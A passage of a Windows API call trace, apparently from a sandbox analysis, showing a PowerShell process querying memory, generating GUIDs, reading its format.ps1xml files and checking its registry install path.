| out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.972] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.973] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.974] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.975] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.976] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x3479b5e6, Data2=0x4772, Data3=0x4186, Data4=([0]=0xb0, [1]=0x80, [2]=0x66, [3]=0x11, [4]=0x35, [5]=0xe0, [6]=0x67, [7]=0x46))) returned 0x0 [0090.978] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x421f0ac5, Data2=0x6b6b, Data3=0x4c4c, Data4=([0]=0xaa, [1]=0xcc, [2]=0x6a, [3]=0xa4, [4]=0xaa, [5]=0x1b, [6]=0x9e, [7]=0x70))) returned 0x0 [0090.978] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xd2613a21, Data2=0x7f80, Data3=0x4393, Data4=([0]=0xb0, [1]=0x27, [2]=0x14, [3]=0x4e, [4]=0x2c, [5]=0xe5, [6]=0x58, [7]=0x71))) returned 0x0 [0090.978] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xa4898910, Data2=0x3d67, Data3=0x47a1, Data4=([0]=0x99, [1]=0x4d, [2]=0xe1, [3]=0xf, [4]=0x2a, [5]=0x4c, [6]=0x77, [7]=0x9f))) returned 0x0 [0090.979] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x5c34eb24, Data2=0x6495, Data3=0x417b, Data4=([0]=0xb0, [1]=0xe8, [2]=0xfe, [3]=0x99, [4]=0x4f, [5]=0xb1, [6]=0x82, [7]=0x75))) returned 0x0 [0090.979] VirtualQuery (in: lpAddress=0x16c3c0, lpBuffer=0x16d280, dwLength=0x30 | out: lpBuffer=0x16d280*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.980] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x8359cdf3, Data2=0x7c56, Data3=0x40e0, Data4=([0]=0x85, [1]=0xa2, [2]=0xac, [3]=0x5e, [4]=0x25, [5]=0x5c, [6]=0x95, [7]=0x58))) returned 0x0 [0090.981] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x8ab6b75, Data2=0x258a, Data3=0x4e68, Data4=([0]=0x9d, [1]=0xb1, [2]=0xb6, [3]=0xb2, [4]=0x89, [5]=0x6f, [6]=0xb3, [7]=0x22))) returned 0x0 [0090.982] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xf1002ca7, Data2=0x8e38, Data3=0x4c1e, Data4=([0]=0x88, [1]=0x3e, [2]=0x70, [3]=0xc0, [4]=0x9e, [5]=0xd, [6]=0x53, [7]=0x90))) returned 0x0 [0090.983] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x715f6847, Data2=0x1b29, Data3=0x4451, Data4=([0]=0xa1, [1]=0x8, [2]=0xe8, [3]=0xbe, [4]=0xcb, [5]=0xb2, [6]=0xcb, [7]=0x28))) returned 0x0 [0090.983] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xee0df2fa, Data2=0xa902, Data3=0x4b84, Data4=([0]=0x86, [1]=0x9e, [2]=0x1a, [3]=0xc3, [4]=0x90, [5]=0x1b, [6]=0x62, [7]=0x1b))) returned 0x0 [0090.984] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x38c80c02, Data2=0x2aab, Data3=0x4de0, Data4=([0]=0xa2, [1]=0x3b, [2]=0x93, [3]=0xdc, [4]=0x4b, [5]=0xf7, [6]=0xe7, [7]=0xa))) returned 0x0 [0090.985] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x97f2acb2, Data2=0xe878, Data3=0x48a3, Data4=([0]=0xb6, [1]=0xb6, [2]=0x1a, [3]=0x89, [4]=0x61, [5]=0x52, [6]=0xd2, [7]=0x92))) returned 0x0 [0090.985] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x8c7f8f5e, Data2=0x5afe, Data3=0x4131, Data4=([0]=0xa1, [1]=0xd4, [2]=0x97, [3]=0xd5, [4]=0x2f, [5]=0xc5, [6]=0x74, [7]=0xd5))) returned 0x0 [0090.986] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x5dda4da5, Data2=0xd133, Data3=0x427b, Data4=([0]=0xae, [1]=0x9c, [2]=0xb4, [3]=0xef, [4]=0x1a, [5]=0xa5, [6]=0x97, [7]=0x59))) returned 0x0 [0090.986] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x4d13c64f, Data2=0x4f46, Data3=0x4c60, Data4=([0]=0x87, [1]=0x9c, [2]=0xc7, [3]=0xa3, [4]=0xfe, [5]=0x2a, [6]=0xaa, [7]=0x61))) returned 0x0 [0090.987] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x5d68ddf1, Data2=0x8fa3, Data3=0x42e6, Data4=([0]=0xac, [1]=0xa5, [2]=0x81, [3]=0xf5, [4]=0x71, [5]=0x0, [6]=0x46, [7]=0xe6))) returned 0x0 [0090.987] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x9b446bb7, Data2=0xcc14, Data3=0x4f6a, Data4=([0]=0x8f, [1]=0xdc, [2]=0x67, [3]=0xa9, [4]=0xd8, [5]=0x62, [6]=0x99, [7]=0x6a))) returned 0x0 [0090.988] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x8d0d1d60, Data2=0x74ad, Data3=0x47d8, Data4=([0]=0x90, [1]=0x8b, [2]=0x23, [3]=0x4, [4]=0xda, [5]=0x8, [6]=0x90, [7]=0x16))) returned 0x0 [0090.988] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x906187c6, Data2=0x10c9, Data3=0x4b48, Data4=([0]=0xbd, [1]=0xba, [2]=0xa, [3]=0x59, [4]=0x20, [5]=0xd8, [6]=0xf8, [7]=0x51))) returned 0x0 [0090.989] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x6520381b, Data2=0x3dbf, Data3=0x4218, Data4=([0]=0xa1, [1]=0xdf, [2]=0x68, [3]=0x3f, [4]=0x77, [5]=0x37, [6]=0xfb, [7]=0x90))) returned 0x0 [0090.989] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x4239811, Data2=0x8baa, Data3=0x4413, Data4=([0]=0xa9, [1]=0xa5, [2]=0x5e, [3]=0x1e, [4]=0xfb, [5]=0x32, [6]=0xce, [7]=0x7a))) returned 0x0 [0090.990] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x2261b981, Data2=0x9d81, Data3=0x48c7, Data4=([0]=0x82, [1]=0x57, [2]=0xac, [3]=0x90, [4]=0x67, [5]=0x59, [6]=0x93, [7]=0x5c))) returned 0x0 [0090.990] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xac33c245, Data2=0xefab, Data3=0x4300, Data4=([0]=0xa4, [1]=0x7c, [2]=0x97, [3]=0x70, [4]=0xcc, [5]=0x2, [6]=0x0, [7]=0x4c))) returned 0x0 [0090.991] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x7280974b, Data2=0x8783, Data3=0x4e09, Data4=([0]=0xa2, [1]=0xc5, [2]=0xdb, [3]=0xe1, [4]=0xf4, [5]=0xe2, [6]=0x58, [7]=0x1))) returned 0x0 [0090.992] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.992] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.996] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.025] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x6108e6a7, Data2=0xc307, Data3=0x4302, Data4=([0]=0x80, [1]=0x8, [2]=0x3b, [3]=0x33, [4]=0x30, [5]=0x45, [6]=0xc3, [7]=0x9d))) returned 0x0 [0091.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0091.026] SetErrorMode (uMode=0x1) returned 0x1 [0091.026] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0091.026] GetFileType (hFile=0x314) returned 0x1 [0091.027] SetErrorMode (uMode=0x1) returned 0x1 [0091.027] GetFileType (hFile=0x314) returned 0x1 [0091.027] ReadFile (in: hFile=0x314, lpBuffer=0x3679bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3679bb0*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.029] ReadFile (in: hFile=0x314, lpBuffer=0x3679bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3679bb0*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.030] ReadFile (in: hFile=0x314, lpBuffer=0x3679bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3679bb0*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.030] ReadFile (in: hFile=0x314, lpBuffer=0x3679bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3679bb0*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.032] ReadFile (in: hFile=0x314, lpBuffer=0x3679bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3679bb0*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.032] ReadFile (in: hFile=0x314, lpBuffer=0x3679bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3679bb0*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.032] ReadFile (in: hFile=0x314, lpBuffer=0x3679bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3679bb0*, lpNumberOfBytesRead=0x16d498*=0x119, lpOverlapped=0x0) returned 1 [0091.033] ReadFile (in: hFile=0x314, lpBuffer=0x3679bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3679bb0*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0091.033] CloseHandle (hObject=0x314) returned 1 [0091.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0091.033] SetErrorMode (uMode=0x1) returned 0x1 [0091.033] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d440 | out: lpFileInformation=0x16d440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0091.033] SetErrorMode (uMode=0x1) returned 0x1 [0091.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0091.034] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d528 | out: phkResult=0x16d528*=0x314) returned 0x0 [0091.034] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d4ac, lpData=0x0, lpcbData=0x16d4a8*=0x0 | out: lpType=0x16d4ac*=0x1, lpData=0x0, lpcbData=0x16d4a8*=0x56) returned 0x0 [0091.034] CoTaskMemAlloc (cb=0x5a) returned 0x30bea0 [0091.034] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d47c, lpData=0x30bea0, lpcbData=0x16d478*=0x56 | out: lpType=0x16d47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d478*=0x56) returned 0x0 [0091.034] CoTaskMemFree (pv=0x30bea0) [0091.034] RegCloseKey (hKey=0x314) returned 0x0 [0091.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0091.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0091.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.039] VirtualQuery (in: lpAddress=0x16bfc0, lpBuffer=0x16ce80, dwLength=0x30 | out: lpBuffer=0x16ce80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.039] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x66813631, Data2=0x35d0, Data3=0x4867, Data4=([0]=0x96, [1]=0x6f, [2]=0x7, [3]=0x7a, [4]=0x2b, [5]=0xbe, [6]=0x6, [7]=0x9e))) returned 0x0 [0091.039] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.040] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x7f1d59bf, Data2=0x80e2, Data3=0x4017, Data4=([0]=0xbc, [1]=0x58, [2]=0xa4, [3]=0x94, [4]=0x2e, [5]=0x96, [6]=0x3, [7]=0x9b))) returned 0x0 [0091.040] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x37c2aedd, Data2=0x53c4, Data3=0x43fc, Data4=([0]=0x97, [1]=0xaa, [2]=0xda, [3]=0x2f, [4]=0xd2, [5]=0x18, [6]=0x9c, [7]=0x60))) returned 0x0 [0091.041] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xef7db740, Data2=0xd11, Data3=0x4f82, Data4=([0]=0x93, [1]=0x16, [2]=0xb0, [3]=0x6a, [4]=0x7d, [5]=0x12, [6]=0xf6, [7]=0x7a))) returned 0x0 [0091.041] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.042] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0091.044] SetErrorMode (uMode=0x1) returned 0x1 [0091.044] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0091.044] GetFileType (hFile=0x314) returned 0x1 [0091.044] SetErrorMode (uMode=0x1) returned 0x1 [0091.044] GetFileType (hFile=0x314) returned 0x1 [0091.044] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.047] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.048] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.048] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.050] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.051] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.051] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.051] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.053] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.054] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.054] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.055] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.055] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.056] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.056] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.057] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.061] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.062] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.062] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.063] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.063] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.064] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.064] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.065] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.065] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.065] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.066] ReadFile (in: 